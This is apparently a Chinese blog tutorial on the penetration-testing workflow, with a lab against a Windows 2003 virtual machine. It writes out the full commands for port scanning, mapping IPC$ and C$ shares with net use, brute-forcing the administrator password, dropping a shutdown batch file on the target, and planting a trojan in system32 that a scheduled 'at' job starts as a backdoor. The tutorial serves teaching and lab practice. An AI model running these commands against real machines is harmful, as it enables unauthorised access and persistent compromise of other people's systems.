第18节 渗透测试流程和简单案例
渗透测试流程和简单案例
- 1渗透测试概述
- 2渗透测试大致流程
- 3简单实验
- 3.1扫描
- 3.2利用共享服务端口445漏洞之IPC$
- 3.3修改用户名增加暴力破解难度的方式
- 3.4暴力破解密码
- 3.5漏洞利用
- 3.6留后门
- 总结
本文章仅供教学研究使用,切莫在真实环境中试验。
1渗透测试概述
- 渗透测试:渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!
- 渗透测试分为 白盒测试 和 黑盒测试。
- 白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析。
- 黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透。
2渗透测试大致流程
- 授权允许测试,保证合法。
- 信息收集(nslookup、whois):收集名称、手机号、IP等信息,有利于破解密码。
- 扫描漏洞、端口等(利用nmap\scanport等工具或Telnet手工测试):
例子:nmap = ip范围 端口 80 (IIS系统类型、发布软件、扫描网站等,各种系统及发布方式都可能存在漏洞)→针对系统类型及其他信息,扫描其漏洞。 - 漏洞利用
- 提权(shell环境即命令环境、桌面环境、获取最高权限)
- 渗透测试报告(网络渗透人员)/为所欲为+毁尸灭迹+留后门(骇客)
3简单实验
3.1扫描
- 打开win2003及winxp,win2003配置固定IP10.1.1.1,winxp配置固定IP10.1.1.2,由winxp攻击win2003.
- win2003中→右键我的电脑→管理→服务→Telnet设为启动,注意常规和恢复中均需要设置。
- 在winxp中→cmd→telnet除了作为命令式远程管理外还可以作为探测工具→telnet 10.1.1.1 445
- 使用小工具scanport对目标IP群和端口群进行扫描,扫描后可以大概确定攻击目标。
3.2利用共享服务端口445漏洞之IPC$
- win2003中创建共享文件夹share,设置权限等。
- 在winxp中验证共享文件夹是否能访问。
- 将share文件夹映射到winxp本地盘符。winxp→cmd→net use f: \10.1.1.1\share ******** /user: administrator。注意f:后、/user前是有一个空格的。
- 相关命令:
net use #查看已建立映射列表
net use f: /del #删除f盘的映射
net use * /del #
net use f: \\10.1.1.1\C$ 密码 /user:账号
net use \\10.1.1.1\IPc$ 密码 /user:账号 #空连接,没有具体路径
net use f: \\10.1.1.1\IPc$ 密码 /user:账号
3.3修改用户名增加暴力破解难度的方式
- 对于账户未知的,账户和密码均需要暴力破解。
- 对于账户名,首先可以通过修改默认名称,避免直接利用默认名称进行密码暴力破解;其次,可以增加几个默认名称,设置为低权限的账户,让密码暴力破解作无用功。
- 服务器的账户可以对administrator账户名进行修改(右键计算机→管理),位置如下:
3.4暴力破解密码
- 在win2008中→cmd→net user administrator 123.com方便破解。
- 打开“真空密码字典生成器”→选择所需要的符号并设定密码长度范围→制作字典
- 打开NTscan软件,该软件仅针对445端口密码进行暴力破解,将上一步保存的字典复制黏贴到此处,并修改名字为NT_pass.dic,开始暴力破解。
3.5漏洞利用
- 向靶机C盘写入文件
#将靶机C盘映射到本地F盘
net use f:\\10.1.1.1\C$ 123.com /user:administrator
#将屏幕信息输入haha.bat
copy con haha.bat
shutdown -s -t 100
^Z
#将haha.bat复制到靶机C盘
copy haha.bat f:
在win2003C盘下生成该文件。
2. 开机默认映射共享文件。右键我的电脑→映射→输入驱动器和共享文件夹(在域中可以输入计算机名)→勾选登录时重连→输入账户密码。
3.6留后门
在winxp中利用“鸽子牧民战天”软件在win2003中留后门,避免管理员账户密码修改后,又需要暴力破解的繁琐过程。配置的各类参数如下,将来再kaili的学习中以下功能均可以采用代码完成。
让木马知道他的主人是谁。
获取靶机空链接的授权,将木马程序复制到目标路径下,并添加到计划任务中。
#获取靶机空链接权限
net use \\10.1.1.1\IPC$ 123.com /user:administrator
#将heihei.exe复制到靶机目录下
copy d:\heihei.exe \\10.1.1.1\C$\windows\system32\
#查看靶机当前时间
net time \\10.1.1.1
#在稍后几分钟自动添加一项作业任务
at \\10.1.1.1 12:55 "c:\windows\system32\heihei.exe"
#查看靶机计划任务
at \\10.1.1.1
4. 查看木马是否正常运行。
5. 随后可以通过该程序实时对靶机进行监视和控制。
总结
本节主要围绕网络渗透流程这一主题,从概述入手介绍主要步骤,随后对每个步骤采用一个小实验进行讲解分析。
第18节 渗透测试流程和简单案例相关推荐
- 渗透测试流程(基础理论)
当时考nisp二级时所学的理论,记录下来复习使用. 渗透测试流程 1.专用术语介绍 1.脚本(asp.php.jsp) 2.html (css.js.html) 3.HTTP协议 4. ...
- 【CyberSecurityLearning 51】渗透测试方法论+渗透测试流程
目录 渗透测试方法论 渗透测试(penetration testing,pentest) 渗透测试种类 * 黑盒测试 * 白盒测试 * 脆弱性评估与渗透测试 安全测试方法论 * 开放式web 应用程序 ...
- 渗透测试流程(单台服务器)
渗透测试流程(单台服务器) 转载于:https://www.cnblogs.com/sky--/p/5781432.html
- 渗透测试入门17之一次完整的渗透测试流程
一次完整的渗透测试流程 目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现 ...
- 渗透测试流程信息收集
渗透测试是一种评估方法,一种通过模拟黑客的攻击方式,来评估网站安全的方法 渗透测试流程分为7个阶段 信息收集 漏洞扫描 漏洞利用 内网转发 内网渗透 痕迹清除 编写报告 但在这7个阶段之前还有一个前提 ...
- 渗透测试八个步骤【渗透测试流程】
渗透测试遵循软件测试的基本流程,但由于其测试过程与目标的特殊性,在具体实现步骤上渗透测试与常见软件测试并不相同.渗透测试流程主要包括8个步骤,如下图所示: 下面结合上图介绍每一个步骤所要完成的任务. ...
- 通用渗透测试框架、简化渗透测试流程
文章目录 通用渗透测试框架 简化的渗透测试流程 黑客攻击的一般过程 通用渗透测试框架 从技术管理的角度来看,遵循正规的测试框架对安全测试极为重要.通用渗透测试框架涵盖了典型的审计测试工作和渗透测试工作 ...
- 渗透测试流程及方法论讲解(web安全入门04)
一.渗透测试方法论 1.1 渗透测试(penetration testing,pentest) 是实施安全评估(即审计)的具体手段. 方法论是在制定.实施信息安全审计方案时,需要遵循的规则.惯例和过程 ...
- 渗透测试流程(拿到一个了网站,应该怎么做)
渗透测试流程 拿到一个待测网站,你感觉应该怎么做? 第一步:信息收集 前端语言.后端语言.中间件.服务器.版本号.开放的端口,真实IP,子目录爬取,注册人信息whois查询,旁站扫描,网站指纹获取(C ...
最新文章
- 微软 microsoft calendar control 11.0 控件下载
- Html 教程 (5) “表格”三要素
- 同一个项目相互调接口_超详细——接口测试总结与分享(一)
- sql语句中的时间查询
- [python] 之 函数简介
- Android 的开源项目的网址
- 把自定义encoder加入ffmpeg源码
- AlphaGo 引发的中国象棋之路
- 【吴恩达深度学习】Residual Networks(PyTorch)
- vmware手动安装VMware tools
- 在计算机中这样切换大小英语字母,怎么在Excel2016表格中快速转换字母大小写
- Mybatis遇到No constructor found in ....的解决方法
- UltraISO 软碟通制作 Windows 7 系统 U 盘启动盘
- 吃一口肥肉之小程序牛刀小试(一)
- 第4届华为编程大赛决赛试题解答(棋盘覆盖)
- python ljust()、center() 、rjust() 字符串填充左中右对齐
- Robot + Appium 搭建 iOS 自动化测试环境
- 硬件学习笔记(器件篇)—— 电感(二)
- 什么是XSL?(XSL概述)
- python求梅森尼数_谈谈梅森旋转:算法及其爆破
热门文章
- 云宏与英特尔携手发布了基于英特尔®至强®可扩展平台全面升级
- H.264/AVC标准参考软件 JM
- Gartner 2019年EPP(终端防护)魔力象限(Endpoint protection platforms)
- 图片切换上一页 下一页
- linux查看告警日志,linux怎么查看硬件告警
- 怎样成为优秀的前端_如何成为优秀的在线社区会员
- 机器人螺栓拆装_一种带电作业机器人专用螺栓拆装固定装置的制作方法
- 使用Python+selenium实例化Microsoft Edge或Chrome浏览器对象和常见的报错
- 【办公自动化】“一键”生成国土空间规划CAD标准图层
- 使用numpy计算准确率